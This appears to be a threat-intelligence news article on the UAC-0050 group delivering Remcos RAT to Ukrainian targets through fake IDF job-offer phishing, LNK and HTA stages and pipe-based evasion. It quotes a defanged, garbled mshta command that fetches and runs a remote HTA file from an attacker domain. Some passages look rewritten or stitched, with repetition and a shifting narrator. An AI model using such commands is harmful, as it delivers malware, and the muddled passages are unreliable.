February 21, 2024
UAC-0050 Group Disseminates Remcos RAT Through Novel Phishing Techniques

To avoid detection by security software, the threat actor known as UAC-0050 is disseminating Remcos RAT through phishing attacks and new techniques.

Karthickkumar Kathiresan and Shilpesh Trivedi, security researchers at Uptycs, stated in a report released on Wednesday that “the group’s weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal.”

“However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability.”

Since 2020, UAC-0050 has been utilizing social engineering campaigns to deceive recipients into opening malicious attachments by posing as trusted organizations. These campaigns have historically targeted Ukrainian and Polish entities.

The adversary was linked by the Computer Emergency Response Team of Ukraine (CERT-UA) to a phishing campaign that was intended to distribute Remcos RAT in February 2023.

The identical trojan has been disseminated in at least three separate phishing waves in recent months; during one of these attacks, an information stealer known as Meduza Stealer was also put into action.

Based on an LNK file that it found on December 21, 2023, Uptycs conducted this analysis. It’s believed that the initial access vector, which is still unknown, involved phishing emails directed towards military personnel in Ukraine, purporting to offer consulting positions with the Israel Defence Forces (IDF).

With the help of mshta.exe, a Windows native binary for executing HTA files, the aforementioned LNK file retrieves and launches an HTML application called “6.hta” from a remote server after gathering information about antivirus software installed on the target computer.

The “word_update.exe” and “ofer.docx” files are downloaded from the domain new-tech-savvy[.]com by a PowerShell script that can be unpacked by another PowerShell script thanks to this step.

When word_update.exe is run, a copy of itself called fmTask_dbg.exe is made, and persistence is established by adding a shortcut to the new executable in the Windows Startup folder.

To decrypt and launch the Remcos RAT (version 4.9.2 Pro), which can collect system data, cookies, and login credentials from web browsers like Internet Explorer, Mozilla Firefox, and Google Chrome, the binary also uses unnamed pipes to enable data exchange between itself and a newly spawned child process for cmd.exe.

“Leveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus systems,” the researchers stated.

“Although not entirely new, this technique marks a significant leap in the sophistication of the group’s strategies.”

Ukraine UAC-0050’s Targeted Utilising Remco’s RAT Pipe Technique for Evasion

The UAC-0050 threat group, well-known for its history of unrelenting cyberattacks against targets in Ukraine, is back at it. However, this time, researchers at Uptycs have uncovered a sophisticated tactic that permits a more covert data transfer channel, successfully eluding antivirus and Endpoint Detection and Response (EDR) detection mechanisms.

RemcosRAT is the group’s preferred tool for espionage; it is a well-known malware designed for remote control and surveillance. In their latest operational twist, the UAC-0050 group has demonstrated their advanced adaptability by integrating a pipe method for interprocess communication. 

Using Windows operating system pipes offers a hidden path for data transfer that deftly avoids detection by antivirus and Endpoint Detection and Response (EDR) programs. This method represents a considerable advancement in the group’s tactics, even though it is not wholly novel.

With its campaign directed toward the Ukrainian government, UAC-0050 has a geopolitical goal in mind. RemcosRAT and the creative data movement techniques involving pipes highlight the group’s emphasis on intelligence gathering and stealth. Although state sponsorship is still a possibility, the group’s actions undoubtedly pose a risk, particularly to government sectors that depend on Windows systems.

On December 21, 2023, the Uptycs platform detected a suspicious.lnk file, prompting our Threat Research Team to launch an investigation. The results of the analysis showed that RemcosRAT was used by UAC-0050 in a targeted cyber intelligence operation against Ukrainian government agencies.

The initial vector of attack remains unidentified, but it appears to be phishing or spam emails disguised as job offers aimed at recruiting Ukrainian military personnel for consulting positions with the Israel Defence Forces (IDF). 

According to the paper (Figure 1), this deceitful strategy involved roles that were primarily focused on teaching IDF soldiers contemporary warfare techniques, which reflected a sophisticated ruse to penetrate military networks.

Early in December 2023, the Ukrainian government formally acknowledged a similar attack pattern, which validates our findings. According to their official website, this incident fits in with UAC-0050’s operational methodology, which reinforces the group’s deliberate and tenacious use of RemcosRAT in their cyberespionage activities.

An HTA file is downloaded in response to a command from the LNK file. This HTA file contains a VBS script that when it runs, launches a PowerShell script. The goal of this PowerShell script is to download word_update.exe, a malicious payload, from a server. Word_update.exe launches runs cmd.exe, and uses a pipe to distribute malicious data. As a result, it causes explorer.exe to launch, containing the malicious RemcosRAT in the program’s memory.

With a.lnk file, the investigation gets started. A Windows shortcut file with the extension “.lnk” points to another file, folder, or program. It enables users to swiftly access the linked resource without having to navigate to its location. Hackers can produce files that, although seeming to be shortcuts to trustworthy programs or documents, really point to and run malicious software.

In this instance, information about installed antivirus programs on the target computer is gathered by the malicious.lnk file. It checks to see if “Windows Defender” matches the display name. In that case, an empty string is used in place of the term. Consequently, the ‘if’ statement’s condition turns false, blocking the execution of the ‘exit’ statement. As a result, any further code is carried out by the script without interruption.

The threat actor has obscured the URL string near the end of the.lnk file. MSHTA is then used to execute the string after it has been deobfuscated. Here is the code that will be executed.

http[:]//new-tech-savvy[.]com/6[.] c:\windows\system32\mshta.exeHTA

After retrieving the 6. the file for examination, we learned that it includes a VBScript file with completely hidden script content.

Researchers studying security have uncovered a fresh phishing attempt that has been linked to the Remcos spyware-distributing UAC-0050 and UAC-0096 groups. Fraudulent emails are used in the attack to fool recipients into downloading and installing spyware on their computers.

Leave a Reply

Your email address will not be published. Required fields are marked *